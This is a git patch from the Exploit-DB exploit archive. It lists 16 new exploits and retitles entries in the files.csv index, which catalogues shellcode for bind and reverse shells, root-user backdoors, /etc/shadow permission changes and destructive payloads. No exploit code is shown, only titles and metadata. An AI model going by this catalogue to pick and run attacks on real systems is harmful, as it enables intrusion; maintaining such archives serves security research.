From d06dff59f9f43c869040c35eaaf3d43a0a9d1364 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 26 Jul 2016 05:04:05 +0000 Subject: [PATCH] DB: 2016-07-26 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 16 new exploits Ubuntu Breezy 5.10 - Installer Password Disclosure Ubuntu 5.10 - Installer Password Disclosure BSD/x86 - setuid/portbind (TCP 31337) shellcode (94 bytes) BSD/x86 - setuid/portbind 31337/TCP shellcode (94 bytes) Linux/x86 - shellcode that forks a HTTP Server on port tcp/8800 (166 bytes) Linux/x86 - listens for shellcode on tcp/5555 and jumps to it (83 bytes) Linux/x86 - Forks a HTTP Server on port 8800/TCP shellcode (166 bytes) Linux/x86 - Listens for shellcode on 5555/TCP and jumps to it (83 bytes) Linux/x86 - Shellcode Polymorphic chmod(_/etc/shadow__666) (54 bytes) Linux/x86 - Polymorphic chmod(_/etc/shadow__666) Shellcode (54 bytes) Linux/x86 - Add root user _r00t_ with no password to /etc/passwd shellcode (69 bytes) Linux/x86 - Add root user 'r00t' with no password to /etc/passwd shellcode (69 bytes) Linux/x86 - SET_PORT() portbind 31337 tcp shellcode (100 bytes) Linux/x86 - SET_PORT() portbind 31337/TCP shellcode (100 bytes) Linux/x86 - Add User _xtz_ without Password to /etc/passwd shellcode (59 bytes) Linux/x86 - Add User 'xtz' without Password to /etc/passwd shellcode (59 bytes) Linux/x86 - Bind /bin/sh to 31337/tcp shellcode (80 bytes) Linux/x86 - Bind /bin/sh to 31337/tcp + fork() shellcode (98 bytes) Linux/x86 - Bind /bin/sh to 31337/TCP shellcode (80 bytes) Linux/x86 - Bind /bin/sh to 31337/TCP + fork() shellcode (98 bytes) Linux/x86 - connect-back shellcode 127.0.0.1:31337/tcp (74 bytes) Linux/x86 - Connect-back shellcode 127.0.0.1:31337/TCP (74 bytes) Linux/x86 - Add user _t00r_ encrypt shellcode (116 bytes) Linux/x86 - Add user 't00r' encrypt shellcode (116 bytes) Linux/x86 - Add user _t00r_ shellcode (82 bytes) Linux/x86 - Add user 't00r' shellcode (82 bytes) Linux/x86 - Add user _z_ shellcode (70 bytes) Linux/x86 - Add User 'z' shellcode (70 bytes) 
Solaris/x86 - portbind/tcp shellcode (Generator) Solaris/x86 - portbind/TCP shellcode (Generator) Linux/x86 - append _/etc/passwd_ & exit() shellcode (107 bytes) Linux/x86 - append '/etc/passwd' & exit() shellcode (107 bytes) Linux/x86 - sends _Phuck3d!_ to all terminals shellcode (60 bytes) Linux/x86 - sends 'Phuck3d!' to all terminals shellcode (60 bytes) Linux/x86 - change mode 0777 of _/etc/shadow_ with sys_chmod syscall shellcode (39 bytes) Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall shellcode (39 bytes) Linux/x86 - change mode 0777 of _/etc/passwd_ with sys_chmod syscall shellcode (39 bytes) Linux/x86 - change mode 0777 of '/etc/passwd' with sys_chmod syscall shellcode (39 bytes) Linux/ARM - Add root user _shell-storm_ with password _toor_ shellcode (151 bytes) Linux/ARM - Add root user 'shell-storm' with password 'toor' shellcode (151 bytes) OS-X/Intel - reverse_tcp shell x86_64 shellcode (131 bytes) OS-X/Intel (x86_64) - reverse_tcp shell shellcode (131 bytes) Linux/SuperH (sh4) - Add root user _shell-storm_ with password _toor_ shellcode (143 bytes) Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' shellcode (143 bytes) Linux/MIPS - Add user(UID 0) _rOOt_ with password _pwn3d_ shellcode (164 bytes) Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' shellcode (164 bytes) Linux/x86-64 - Bind TCP 4444 Port Shellcode (81 bytes / 96 bytes with password) Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password) Linux/x86 - TCP Bind Shell 33333 Port Shellcode (96 bytes) Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes) OS-X/x86-64 - tcp 4444 port bind Nullfree shellcode (144 bytes) OS-X/x86-64 - 4444/TPC port bind Nullfree shellcode (144 bytes) Linux/x86-64 - Bind TCP 4444 Port Shellcode (103 bytes) Linux/x86-64 - TCP 4444 port Bindshell with Password Prompt shellcode (162 bytes) Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes) Linux/x86-64 - Bindshell 4444/TCP with Password 
Prompt shellcode (162 bytes) Linux/x86-64 - Bind TCP Port 1472 shellcode (IPv6) (199 bytes) Linux/x86-64 - Bind 1472/TCP shellcode (IPv6) (199 bytes) Linux/x86 - TCP Bind Shell Port 4444 shellcode (656 bytes) Linux/x86 - Bind Shell Port 4444/TCP shellcode (656 bytes) Linux/x86 - TCP Bind Shell Port 4444 shellcode (98 bytes) Linux/x86 - Bind Shell Port 4444/TCP shellcode (98 bytes) Rapid7 AppSpider 6.12 - Local Privilege Escalation Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit) Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit) MediaCoder 0.8.43.5852 - .m3u SEH Exploit Drupal CODER Module 2.5 - Remote Command Execution (Metasploit) CodoForum 3.2.1 - SQL Injection CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter+ASLR bypass) GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload PHP gettext (gettext.php) 1.0.12 - Unauthenticated Code Execution PHP 7.0.8_ 5.6.23 and 5.5.37 - bzread() Out-of-Bounds Write Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities --- files.csv | 78 ++++--- platforms/cgi/webapps/40156.py | 305 +++++++++++++++++++++++++ platforms/cgi/webapps/40157.py | 130 +++++++++++ platforms/hardware/webapps/40158.txt | 63 ++++++ platforms/hardware/webapps/40159.txt | 75 +++++++ platforms/hardware/webapps/40160.py | 268 ++++++++++++++++++++++ platforms/java/webapps/40161.txt | 263 ++++++++++++++++++++++ platforms/linux/remote/40146.rb | 238 ++++++++++++++++++++ platforms/linux/remote/40147.rb | 169 ++++++++++++++ platforms/php/dos/40155.txt | 324 
+++++++++++++++++++++++++++ platforms/php/webapps/40149.rb | 107 +++++++++ platforms/php/webapps/40150.txt | 35 +++ platforms/php/webapps/40153.txt | 183 +++++++++++++++ platforms/php/webapps/40154.txt | 247 ++++++++++++++++++++ platforms/windows/local/40145.txt | 90 ++++++++ platforms/windows/local/40148.py | 58 +++++ platforms/windows/local/40151.py | 53 +++++ 17 files changed, 2655 insertions(+), 31 deletions(-) create mode 100755 platforms/cgi/webapps/40156.py create mode 100755 platforms/cgi/webapps/40157.py create mode 100755 platforms/hardware/webapps/40158.txt create mode 100755 platforms/hardware/webapps/40159.txt create mode 100755 platforms/hardware/webapps/40160.py create mode 100755 platforms/java/webapps/40161.txt create mode 100755 platforms/linux/remote/40146.rb create mode 100755 platforms/linux/remote/40147.rb create mode 100755 platforms/php/dos/40155.txt create mode 100755 platforms/php/webapps/40149.rb create mode 100755 platforms/php/webapps/40150.txt create mode 100755 platforms/php/webapps/40153.txt create mode 100755 platforms/php/webapps/40154.txt create mode 100755 platforms/windows/local/40145.txt create mode 100755 platforms/windows/local/40148.py create mode 100755 platforms/windows/local/40151.py
diff --git a/files.csv b/files.csv
index 075afaaa0..b7a8b4ddf 100755
--- a/files.csv
+++ b/files.csv
@@ -1319,7 +1319,7 @@ id,file,description,date,author,platform,type,port
 1576,platforms/php/webapps/1576.txt,"Jupiter CMS <= 1.1.5 - Multiple XSS Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0
 1577,platforms/irix/local/1577.sh,"SGI IRIX <= 6.5.28 - (runpriv) Design Error",2005-10-10,anonymous,irix,local,0
 1578,platforms/linux/remote/1578.c,"PeerCast <= 0.1216 - (nextCGIarg) Remote Buffer Overflow Exploit (2)",2006-03-12,darkeagle,linux,remote,7144
-1579,platforms/linux/local/1579.pl,"Ubuntu Breezy 5.10 - Installer Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0
+1579,platforms/linux/local/1579.pl,"Ubuntu 5.10 - Installer Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0
 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog <= 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0
 1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 - SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327
 1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit",2006-03-13,"Kevin Finisterre",osx,remote,25
@@ -11718,7 +11718,7 @@ id,file,description,date,author,platform,type,port
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
 13243,platforms/bsd_ppc/shellcode/13243.c,"BSD/PPC - execve /bin/sh shellcode (128 bytes)",2004-09-26,Palante,bsd_ppc,shellcode,0
 13244,platforms/bsd_x86/shellcode/13244.c,"BSD/x86 - setuid(0) then execve /bin/sh shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0
-13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - setuid/portbind (TCP 31337) shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0
+13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - setuid/portbind 31337/TCP shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0
 13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh multiplatform shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0
 13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh setuid (0) shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
 13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - portbind port 31337 shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0
@@ -11784,14 +11784,14 @@ id,file,description,date,author,platform,type,port
 13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
 13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - portbind port 8975 shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
 13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying shellcode for IDS evasion (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
-13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - shellcode that forks a HTTP Server on port tcp/8800 (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
-13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - listens for shellcode on tcp/5555 and jumps to it (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0
+13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on port 8800/TCP shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
+13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens for shellcode on 5555/TCP and jumps to it (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0
 13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Polymorphic shellcode disable Network Card (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0
 13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 polymorphic shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
 13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - /bin/sh polymorphic shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
 13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 - 4444 Port Binding Shellcode (xor-encoded) (152 bytes)",2009-07-10,Rick,lin_x86,shellcode,0
 13314,platforms/lin_x86/shellcode/13314.c,"Linux/x86 - reboot() polymorphic shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",lin_x86,shellcode,0
-13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - Shellcode Polymorphic 
chmod(_/etc/shadow__666) (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0
+13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - Polymorphic chmod(_/etc/shadow__666) Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0
 13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0
 13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - bindport 8000 & execve iptables -F shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
 13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - bindport 8000 & add user with root access shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
@@ -11825,7 +11825,7 @@ id,file,description,date,author,platform,type,port
 13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0
 13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - /sbin/ipchains -F shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
 13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - set system time to 0 and exit shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
-13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add root user _r00t_ with no password to /etc/passwd shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
+13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add root user 'r00t' with no password to /etc/passwd shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
 13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
 13351,platforms/lin_x86/shellcode/13351.c,"Linux/x86 - forkbomb shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
 13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
@@ -11839,7 +11839,7 @@ id,file,description,date,author,platform,type,port
 13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - setuid/portbind (Port 31337) shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
 13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - portbind (2707) shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0
 13362,platforms/lin_x86/shellcode/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0
-13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - SET_PORT() portbind 31337 tcp shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
+13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - SET_PORT() portbind 31337/TCP shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
 13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - SET_IP() Connectback (192.168.13.22:31337) Shellcode (82 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
 13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0
 13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - xor-encoded Connect Back (127.0.0.1:80) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0
@@ -11861,15 +11861,15 @@ id,file,description,date,author,platform,type,port
 13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh anti-ids shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0
 13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 - execve /bin/sh xored for Intel x86 CPUID shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0
 13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh shellcode (encoded by +1) (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0
-13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User _xtz_ without Password to /etc/passwd shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User 'xtz' without Password to /etc/passwd shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13386,platforms/lin_x86/shellcode/13386.c,"Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/tcp shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/tcp + fork() shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/TCP shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/TCP + fork() shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows 
/dev/cdrom symlink) shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - connect-back shellcode 127.0.0.1:31337/tcp (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Connect-back shellcode 127.0.0.1:31337/TCP (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0
@@ -11904,7 +11904,7 @@ id,file,description,date,author,platform,type,port
 13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0
 13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
 13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - portbind port 5074 toupper shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0
-13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add user _t00r_ encrypt shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
+13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add user 't00r' encrypt shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
 13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 shadow ENCRYPT shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
 13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
 13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0
@@ -11926,7 +11926,7 @@ id,file,description,date,author,platform,type,port
 13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
 13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - portbind port 5074 shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
 13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - portbind port 5074 + fork() shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
-13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add user _t00r_ shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
+13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add user 't00r' shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
 13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add user shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0
 13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0
 13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0
@@ -11937,7 +11937,7 @@ id,file,description,date,author,platform,type,port
 13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - execve of /bin/sh after setreuid(0_0) shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0
 13459,platforms/lin_x86/shellcode/13459.c,"Linux/x86 - chroot()/execve() code shellcode (80 bytes)",2001-01-13,preedator,lin_x86,shellcode,0
 13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh toupper() evasion shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0
-13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add user _z_ shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
+13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User 'z' shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
 13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
 13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - bindshell port 4444 shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0
 13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0
@@ -11974,7 +11974,7 @@ id,file,description,date,author,platform,type,port
 13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - portbind port 6789 shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
 13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - connect-bac shellcode k (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
 13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - portbinding shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0
-13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - portbind/tcp shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0
+13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - portbind/TCP shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0
 13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
 13500,platforms/solaris_x86/shellcode/13500.c,"Solaris/x86 - setuid(0)_ execve(/bin/cat_ /etc/shadow)_ exit(0) shellcode (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
 13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh toupper evasion shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0
@@ -12030,7 +12030,7 @@ id,file,description,date,author,platform,type,port
 13576,platforms/lin_x86/shellcode/13576.asm,"Linux/x86 - chmod 666 /etc/shadow shellcode (27 bytes)",2010-01-16,root@thegibson,lin_x86,shellcode,0
 13577,platforms/lin_x86/shellcode/13577.txt,"Linux/x86 - break chroot shellcode (79 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0
 13578,platforms/lin_x86/shellcode/13578.txt,"Linux/x86 - fork bomb shellcode (6 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0
-13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - append _/etc/passwd_ & exit() shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0
+13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - append '/etc/passwd' & exit() shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0
 13581,platforms/windows/shellcode/13581.txt,"Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
 13582,platforms/windows/shellcode/13582.txt,"Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
 13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - eject /dev/cdrom shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0
@@ -12069,7 +12069,7 @@ id,file,description,date,author,platform,type,port
 13682,platforms/lin_x86/shellcode/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) & execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,lin_x86,shellcode,0
 13688,platforms/lin_x86-64/shellcode/13688.c,"Linux/x86-64 - reboot(POWER_OFF) shellcode (19 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0
 13691,platforms/lin_x86-64/shellcode/13691.c,"Linux/x86-64 - execve(_/bin/sh_); shellcode (30 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0
-13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - sends _Phuck3d!_ to all terminals shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0
+13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - sends 'Phuck3d!' to all terminals shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0
 13697,platforms/lin_x86/shellcode/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0
 13698,platforms/lin_x86/shellcode/13698.c,"Linux/x86 - polymorphic execve(_/bin/bash___-p__NULL) shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",lin_x86,shellcode,0
 13699,platforms/win_x86/shellcode/13699.txt,"Windows XP SP2 FR - Download and Exec Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode,0
@@ -12084,9 +12084,9 @@ id,file,description,date,author,platform,type,port
 13716,platforms/lin_x86/shellcode/13716.c,"Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes)",2010-05-27,agix,lin_x86,shellcode,0
 13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Pro SP1 64 FR - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0
 13722,platforms/lin_x86/shellcode/13722.c,"Linux/x86 - Polymorphic setuid(0) + chmod(_/etc/shadow__ 0666) Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode,0
-13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - change mode 0777 of _/etc/shadow_ with sys_chmod syscall shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
+13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
 13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - kill all running process shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
